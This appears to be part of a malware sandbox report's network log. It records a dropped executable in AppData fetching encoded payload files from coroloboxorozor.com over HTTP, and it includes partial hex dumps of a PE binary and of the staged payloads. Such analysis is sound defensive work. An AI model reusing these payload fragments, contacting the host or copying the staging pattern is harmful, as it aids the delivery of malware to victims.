                                    Feb 23, 2021 16:53:54.356101036 CET2INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:53:54 GMT
                                    Server: Apache/2.2.31 (CentOS)
                                    Last-Modified: Tue, 23 Feb 2021 07:25:52 GMT
                                    ETag: "211e7-99b78-5bbfbd40d5228"
                                    Accept-Ranges: bytes
                                    Content-Length: 629624
                                    Connection: close
                                    Content-Type: application/octet-stream
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 be 7d f2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 06 00 00 00 00 00 00 2e 9b 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 8c 7e 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 9a 09 00 57 00 00 00 00 a0 09 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 84 09 00 78 17 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 03 00 00 00 a0 09 00 00 04 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9b 09 00 00 00 00 00 48 00 00 00 02 00 05 00 58 61 09 00 7c 39 00 00 03 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 17 00 00 0a 00 2a a6 73 18 00 00 0a 80 01 00 00 04 73 19 00 00 0a 80 02 00 00 04 73 0b 00 00 06 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 42 02 28 17 00 00 0a 00 00 02 28 09 00 00 06 00 2a 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 58 01 00 70 fe 0e 01 00 72 5c 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 20 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 2a 00 00 01 10 00 00 02 00 24 00 6a 8e 00 11 00 00 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 68 01 00 70 fe 0e 01 00 72 7e 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 24 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}0|. @ ~@Wx H.text4{ | `.rsrc~@@.reloc@BHXa|9*"(*ssss*B((*0rXpr\ps+ (+o,88(-(.((/o%&(0:o'o18*$j0rhpr~ps+$(+o,88(-(.((/o%&(0:o'o18


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.2249166172.67.172.1780C:\Users\user\AppData\Roaming\twox67345.exe
                                    TimestampkBytes transferredDirectionData
                                    Feb 23, 2021 16:54:00.336730957 CET667OUTGET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Connection: Keep-Alive
                                    Feb 23, 2021 16:54:03.866312027 CET668INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:54:03 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=dc05dc9ffb33e5ff4fed07e7094ccbea61614095640; expires=Thu, 25-Mar-21 15:54:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:06 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 087131ff3700000c65f2922000000001
                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=H0ZnWxmIwfPPLQE%2F1FWpT4KFWYbd9cX2axR5t7tj5iUt%2Fv1LXnVm3bJGfzJoAtZYWQ70zjtH6nHsm99lAozOjx8EnhbTKok6GmhFCxvOxUPKl8ok"}],"group":"cf-nel"}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 62621f785a490c65-AMS
                                    Data Raw: 37 63 39 37 0d 0a 3c 70 3e 56 56 68 6e 4a 68 58 50 50 68 4a 68 75 68 4a 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 52 53 53 68 52 53 53 68 4a 68 4a 68 58 78 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 6a 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 4a 68 4a 68 58 50 68 75 58 68 58 78 6a 68 58 50 68 4a 68 58 78 4a 68 6e 68 52 4a 53 68 75 75 68 58 78 50 68 58 68 56 6a 68 52 4a 53 68 75 75 68 78 50 68 58 4a 50 68 58 4a 53 68 58 58 53 68 75 52 68 58 58 52 68 58 58 50 68 58 58 58 68 58 4a 75 68 58 58 50 68 6e 56 68 58 4a 6e 68 75 52 68 6e 6e 68 6e 56 68 58 58 4a 68 58 58 4a 68 58 58 58 68 58 58 6a 68 75 52 68 6e 78 68 58 4a 58 68 75 52 68 58 58 50 68 58 58 56 68 58 58 4a 68 75 52 68 58 4a 53 68 58 58 4a 68 75 52 68 6a 78 68 56 6e 68 78 75 68 75 52 68 58 4a 6e 68 58 58 58 68 58 4a 4a 68 58 4a 58 68 50 6a 68 58 75 68 58 75 68 58 4a 68 75 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 78 4a 68 6a 6e 68 4a 68 4a 68 56 6a 68 58 68 75 68 4a 68 56 6a 68 58 50 52 68 50 58 68 58 78 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 52 50 68 4a 68 75 50 68 4a 68 58 58 68 58 68 78 4a 68 4a 68 4a 68 58 75 52 68 53 68 4a 68 4a 68 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 53 50 68 58 6a 58 68 53 68 4a 68 4a 68 75 52 68 4a 68 4a 68 4a 68 58 6e 52 68 53 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 75 52 68 4a 68 4a 68 4a 68 52 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 4a 68 4a 68
                                    Data Ascii: 7c97<p>VVhnJhXPPhJhuhJhJhJhPhJhJhJhRSShRSShJhJhXxPhJhJhJhJhJhJhJhjPhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhXRxhJhJhJhXPhuXhXxjhXPhJhXxJhnhRJShuuhXxPhXhVjhRJShuuhxPhXJPhXJShXXShuRhXXRhXXPhXXXhXJuhXXPhnVhXJnhuRhnnhnVhXXJhXXJhXXXhXXjhuRhnxhXJXhuRhXXPhXXVhXXJhuRhXJShXXJhuRhjxhVnhxuhuRhXJnhXXXhXJJhXJXhPjhXuhXuhXJhujhJhJhJhJhJhJhJhxJhjnhJhJhVjhXhuhJhVjhXPRhPXhXxJhJhJhJhJhJhJhJhJhRRPhJhuPhJhXXhXhxJhJhJhXuRhShJhJhjhJhJhJhJhJhJhRSPhXjXhShJhJhuRhJhJhJhXnRhShJhJhJhJhXRxhJhuRhJhJhJhRhJhJhPhJhJhJhJhJhJhJhPhJhJhJhJhJh
                                    Feb 23, 2021 16:55:09.731744051 CET1731OUTGET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Feb 23, 2021 16:55:12.886451960 CET1733INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:55:12 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=d1277d60305cba58c94c33ec19b1898e31614095709; expires=Thu, 25-Mar-21 15:55:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:08 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 0871330e4900000c65dc170000000001
                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dRDS%2FuoO7NoDqjffPZWFouj36bqe8LRMLpWh6H814tB%2FPPe2v4m0YGdDihwemKbex1IZR%2FZCTsDBpVZExqPCjfRj%2B%2FSyB8n1czSl0uNmC15xU4r%2F"}],"group":"cf-nel"}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6262212a0aab0c65-AMS
                                    Data Raw: 33 33 31 38 0d 0a 3c 70 3e 58 78 68 52 58 78 68 58 78 4a 68 58 78 4a 68 56 53 68 56 53 68 6a 53 68 6a 53 68 53 53 68 53 53 68 58 4a 68 58 4a 68 6a 58 68 6a 58 68 58 53 68 58 53 68 75 56 68 75 56 68 52 53 68 52 53 68 52 75 56 68 52 75 56 68 58 6a 4a 68 58 6a 4a 68 78 75 68 78 75 68 75 78 68 75 78 68 58 56 68 58 56 68 75 53 68 75 53 68 52 4a 68 52 4a 68 53 56 68 53 56 68 6a 68 6a 68 52 50 50 68 52 50 50 68 58 52 78 68 58 52 78 68 58 58 50 68 58 58 50 68 6a 6a 68 6a 6a 68 75 78 68 75 78 68 53 50 68 53 50 68 52 4a 78 68 52 4a 53 68 58 6a 4a 68 58 6a 4a 68 52 4a 78 68 52 4a 78 68 58 6a 52 68 58 6a 52 68 75 58 68 52 78 68 50 53 68 50 53 68 52 6e 68 52 6e 68 50 58 68 50 58 68 56 56 68 6a 50 68 53 58 68 53 58 68 6e 50 68 6e 50 68 52 75 78 68 52 75 78 68 52 4a 50 68 58 6e 58 68 58 50 75 68 58 50 75 68 58 56 75 68 58 56 75 68 52 78 68 52 78 68 75 68 4a 68 58 58 50 68 58 58 50 68 56 68 56 68 52 75 58 68 52 75 58 68 53 4a 68 50 56 68 58 56 52 68 58 56 52 68 58 6a 75 68 58 53 75 68 53 78 68 53 78 68 52 53 52 68 52 50 58 68 52 50 52 68 52 75 6e 68 58 53 68 52 50 78 68 58 58 52 68 58 4a 78 68 58 6a 68 52 50 50 68 58 75 52 68 58 75 52 68 58 78 52 68 6e 78 68 52 52 78 68 58 52 56 68 58 68 58 75 6e 68 78 75 68 58 50 68 75 52 68 52 58 75 68 6a 78 68 52 58 75 68 50 78 68 52 75 52 68 58 56 68 58 6a 6e 68 58 4a 75 68 52 68 58 6e 58 68 78 78 68 75 56 68 58 78 4a 68 52 50 68 58 6e 56 68 58 6e 6e 68 6e 78 68 58 53 78 68 53 56 68 56 53 68 58 53 68 50 53 68 58 6e 4a 68 58 58 58 68 52 53 4a 68 75 4a 68 58 78 53 68 56 56 68 56 56 68 58 53 6a 68 52 68 58 56 6a 68 58 56 6a 68 58 53 78 68 75 4a 68 52 52 56
                                    Data Ascii: 3318<p>XxhRXxhXxJhXxJhVShVShjShjShSShSShXJhXJhjXhjXhXShXShuVhuVhRShRShRuVhRuVhXjJhXjJhxuhxuhuxhuxhXVhXVhuShuShRJhRJhSVhSVhjhjhRPPhRPPhXRxhXRxhXXPhXXPhjjhjjhuxhuxhSPhSPhRJxhRJShXjJhXjJhRJxhRJxhXjRhXjRhuXhRxhPShPShRnhRnhPXhPXhVVhjPhSXhSXhnPhnPhRuxhRuxhRJPhXnXhXPuhXPuhXVuhXVuhRxhRxhuhJhXXPhXXPhVhVhRuXhRuXhSJhPVhXVRhXVRhXjuhXSuhSxhSxhRSRhRPXhRPRhRunhXShRPxhXXRhXJxhXjhRPPhXuRhXuRhXxRhnxhRRxhXRVhXhXunhxuhXPhuRhRXuhjxhRXuhPxhRuRhXVhXjnhXJuhRhXnXhxxhuVhXxJhRPhXnVhXnnhnxhXSxhSVhVShXShPShXnJhXXXhRSJhuJhXxShVVhVVhXSjhRhXVjhXVjhXSxhuJhRRV


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.2249168172.67.172.1780C:\Users\user\AppData\Roaming\twox67345.exe
                                    TimestampkBytes transferredDirectionData
                                    Feb 23, 2021 16:55:35.489645958 CET1982OUTGET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Connection: Keep-Alive
                                    Feb 23, 2021 16:55:35.587418079 CET1983INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:55:35 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=df5001e909f35bfe54caea8bd372f872b1614095735; expires=Thu, 25-Mar-21 15:55:35 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:06 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 08713372e800007287f4836000000001
                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=EP40MIldJjKKHI2qNxza%2FUUK%2BJ%2BC%2FdpFATwdKlvMFJ1FwhLkHM%2BFEtSjYagStzQqonqHki8AyObfTRDbjQPbkhrcm%2BYDvxULrwo9XPO6dYsSHj8V"}]}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 626221cb0fbe7287-AMS
                                    Data Raw: 37 63 38 66 0d 0a 3c 70 3e 56 56 68 6e 4a 68 58 50 50 68 4a 68 75 68 4a 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 52 53 53 68 52 53 53 68 4a 68 4a 68 58 78 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 6a 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 4a 68 4a 68 58 50 68 75 58 68 58 78 6a 68 58 50 68 4a 68 58 78 4a 68 6e 68 52 4a 53 68 75 75 68 58 78 50 68 58 68 56 6a 68 52 4a 53 68 75 75 68 78 50 68 58 4a 50 68 58 4a 53 68 58 58 53 68 75 52 68 58 58 52 68 58 58 50 68 58 58 58 68 58 4a 75 68 58 58 50 68 6e 56 68 58 4a 6e 68 75 52 68 6e 6e 68 6e 56 68 58 58 4a 68 58 58 4a 68 58 58 58 68 58 58 6a 68 75 52 68 6e 78 68 58 4a 58 68 75 52 68 58 58 50 68 58 58 56 68 58 58 4a 68 75 52 68 58 4a 53 68 58 58 4a 68 75 52 68 6a 78 68 56 6e 68 78 75 68 75 52 68 58 4a 6e 68 58 58 58 68 58 4a 4a 68 58 4a 58 68 50 6a 68 58 75 68 58 75 68 58 4a 68 75 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 78 4a 68 6a 6e 68 4a 68 4a 68 56 6a 68 58 68 75 68 4a 68 56 6a 68 58 50 52 68 50 58 68 58 78 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 52 50 68 4a 68 75 50 68 4a 68 58 58 68 58 68 78 4a 68 4a 68 4a 68 58 75 52 68 53 68 4a 68 4a 68 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 53 50 68 58 6a 58 68 53 68 4a 68 4a 68 75 52 68 4a 68 4a 68 4a 68 58 6e 52 68 53 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 75 52 68 4a 68 4a 68 4a 68 52 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 50 68 4a 68
                                    Data Ascii: 7c8f<p>VVhnJhXPPhJhuhJhJhJhPhJhJhJhRSShRSShJhJhXxPhJhJhJhJhJhJhJhjPhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhXRxhJhJhJhXPhuXhXxjhXPhJhXxJhnhRJShuuhXxPhXhVjhRJShuuhxPhXJPhXJShXXShuRhXXRhXXPhXXXhXJuhXXPhnVhXJnhuRhnnhnVhXXJhXXJhXXXhXXjhuRhnxhXJXhuRhXXPhXXVhXXJhuRhXJShXXJhuRhjxhVnhxuhuRhXJnhXXXhXJJhXJXhPjhXuhXuhXJhujhJhJhJhJhJhJhJhxJhjnhJhJhVjhXhuhJhVjhXPRhPXhXxJhJhJhJhJhJhJhJhJhRRPhJhuPhJhXXhXhxJhJhJhXuRhShJhJhjhJhJhJhJhJhJhRSPhXjXhShJhJhuRhJhJhJhXnRhShJhJhJhJhXRxhJhuRhJhJhJhRhJhJhPhJhJhJhJhJhJhJhPhJh
                                    Feb 23, 2021 16:55:36.386945009 CET3044OUTGET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Feb 23, 2021 16:55:36.452714920 CET3045INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:55:36 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=deae9a3204fd39e3338c63a1f9e6e8f171614095736; expires=Thu, 25-Mar-21 15:55:36 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:08 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 087133766800007287ee8f5000000001
                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oqCrxXezgCOZVl35rw1dkq5IG74TJnQqG20wIyjsBYhbBDweelbsrCRSqbeQpH1HUlaiwNX5l%2BDPBnJSqnXHplqEJ4FWlSH0uXaZctVKIf18t83g"}]}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 626221d0a9a27287-AMS
                                    Data Raw: 33 33 31 38 0d 0a 3c 70 3e 58 78 68 52 58 78 68 58 78 4a 68 58 78 4a 68 56 53 68 56 53 68 6a 53 68 6a 53 68 53 53 68 53 53 68 58 4a 68 58 4a 68 6a 58 68 6a 58 68 58 53 68 58 53 68 75 56 68 75 56 68 52 53 68 52 53 68 52 75 56 68 52 75 56 68 58 6a 4a 68 58 6a 4a 68 78 75 68 78 75 68 75 78 68 75 78 68 58 56 68 58 56 68 75 53 68 75 53 68 52 4a 68 52 4a 68 53 56 68 53 56 68 6a 68 6a 68 52 50 50 68 52 50 50 68 58 52 78 68 58 52 78 68 58 58 50 68 58 58 50 68 6a 6a 68 6a 6a 68 75 78 68 75 78 68 53 50 68 53 50 68 52 4a 78 68 52 4a 53 68 58 6a 4a 68 58 6a 4a 68 52 4a 78 68 52 4a 78 68 58 6a 52 68 58 6a 52 68 75 58 68 52 78 68 50 53 68 50 53 68 52 6e 68 52 6e 68 50 58 68 50 58 68 56 56 68 6a 50 68 53 58 68 53 58 68 6e 50 68 6e 50 68 52 75 78 68 52 75 78 68 52 4a 50 68 58 6e 58 68 58 50 75 68 58 50 75 68 58 56 75 68 58 56 75 68 52 78 68 52 78 68 75 68 4a 68 58 58 50 68 58 58 50 68 56 68 56 68 52 75 58 68 52 75 58 68 53 4a 68 50 56 68 58 56 52 68 58 56 52 68 58 6a 75 68 58 53 75 68 53 78 68 53 78 68 52 53 52 68 52 50 58 68 52 50 52 68 52 75 6e 68 58 53 68 52 50 78 68 58 58 52 68 58 4a 78 68 58 6a 68 52 50 50 68 58 75 52 68 58 75 52 68 58 78 52 68 6e 78 68 52 52 78 68 58 52 56 68 58 68 58 75 6e 68 78 75 68 58 50 68 75 52 68 52 58 75 68 6a 78 68 52 58 75 68 50 78 68 52 75 52 68 58 56 68 58 6a 6e 68 58 4a 75 68 52 68 58 6e 58 68 78 78 68 75 56 68 58 78 4a 68 52 50 68 58 6e 56 68 58 6e 6e 68 6e 78 68 58 53 78 68 53 56 68 56 53 68 58 53 68 50 53 68 58 6e 4a 68 58 58 58 68 52 53 4a 68 75 4a 68 58 78 53 68 56 56 68 56 56 68 58 53 6a 68 52 68 58 56 6a 68 58 56 6a 68 58 53 78 68 75 4a 68 52 52 56 68 58 56 78 68 58 6e 52 68 52
                                    Data Ascii: 3318<p>XxhRXxhXxJhXxJhVShVShjShjShSShSShXJhXJhjXhjXhXShXShuVhuVhRShRShRuVhRuVhXjJhXjJhxuhxuhuxhuxhXVhXVhuShuShRJhRJhSVhSVhjhjhRPPhRPPhXRxhXRxhXXPhXXPhjjhjjhuxhuxhSPhSPhRJxhRJShXjJhXjJhRJxhRJxhXjRhXjRhuXhRxhPShPShRnhRnhPXhPXhVVhjPhSXhSXhnPhnPhRuxhRuxhRJPhXnXhXPuhXPuhXVuhXVuhRxhRxhuhJhXXPhXXPhVhVhRuXhRuXhSJhPVhXVRhXVRhXjuhXSuhSxhSxhRSRhRPXhRPRhRunhXShRPxhXXRhXJxhXjhRPPhXuRhXuRhXxRhnxhRRxhXRVhXhXunhxuhXPhuRhRXuhjxhRXuhPxhRuRhXVhXjnhXJuhRhXnXhxxhuVhXxJhRPhXnVhXnnhnxhXSxhSVhVShXShPShXnJhXXXhRSJhuJhXxShVVhVVhXSjhRhXVjhXVjhXSxhuJhRRVhXVxhXnRhR


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.2249169172.67.172.1780C:\Users\user\AppData\Roaming\twox67345.exe
                                    TimestampkBytes transferredDirectionData
                                    Feb 23, 2021 16:55:45.330288887 CET3292OUTGET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Connection: Keep-Alive
                                    Feb 23, 2021 16:55:45.417587996 CET3293INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:55:45 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=dfda84ac06451b89b6feadd24fd6a35551614095745; expires=Thu, 25-Mar-21 15:55:45 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:06 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 087133995800000b2fb83a5000000001
                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=89IxkNiwMFWKdXKQq%2FheM%2BxnwbCJQ9tfNGCrV%2FUhLFxMltCg2sOpdJXDiiwEk1HD5QlqelRD3zcBb%2BrujXNDi4qAf8nxbJqvLPFwhjvQEfYUDZVT"}],"max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 626222088df50b2f-AMS
                                    Data Raw: 37 63 39 33 0d 0a 3c 70 3e 56 56 68 6e 4a 68 58 50 50 68 4a 68 75 68 4a 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 52 53 53 68 52 53 53 68 4a 68 4a 68 58 78 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 6a 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 4a 68 4a 68 58 50 68 75 58 68 58 78 6a 68 58 50 68 4a 68 58 78 4a 68 6e 68 52 4a 53 68 75 75 68 58 78 50 68 58 68 56 6a 68 52 4a 53 68 75 75 68 78 50 68 58 4a 50 68 58 4a 53 68 58 58 53 68 75 52 68 58 58 52 68 58 58 50 68 58 58 58 68 58 4a 75 68 58 58 50 68 6e 56 68 58 4a 6e 68 75 52 68 6e 6e 68 6e 56 68 58 58 4a 68 58 58 4a 68 58 58 58 68 58 58 6a 68 75 52 68 6e 78 68 58 4a 58 68 75 52 68 58 58 50 68 58 58 56 68 58 58 4a 68 75 52 68 58 4a 53 68 58 58 4a 68 75 52 68 6a 78 68 56 6e 68 78 75 68 75 52 68 58 4a 6e 68 58 58 58 68 58 4a 4a 68 58 4a 58 68 50 6a 68 58 75 68 58 75 68 58 4a 68 75 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 78 4a 68 6a 6e 68 4a 68 4a 68 56 6a 68 58 68 75 68 4a 68 56 6a 68 58 50 52 68 50 58 68 58 78 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 52 50 68 4a 68 75 50 68 4a 68 58 58 68 58 68 78 4a 68 4a 68 4a 68 58 75 52 68 53 68 4a 68 4a 68 6a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 52 53 50 68 58 6a 58 68 53 68 4a 68 4a 68 75 52 68 4a 68 4a 68 4a 68 58 6e 52 68 53 68 4a 68 4a 68 4a 68 4a 68 58 52 78 68 4a 68 75 52 68 4a 68 4a 68 4a 68 52 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 4a 68 50 68 4a 68 4a 68 4a 68
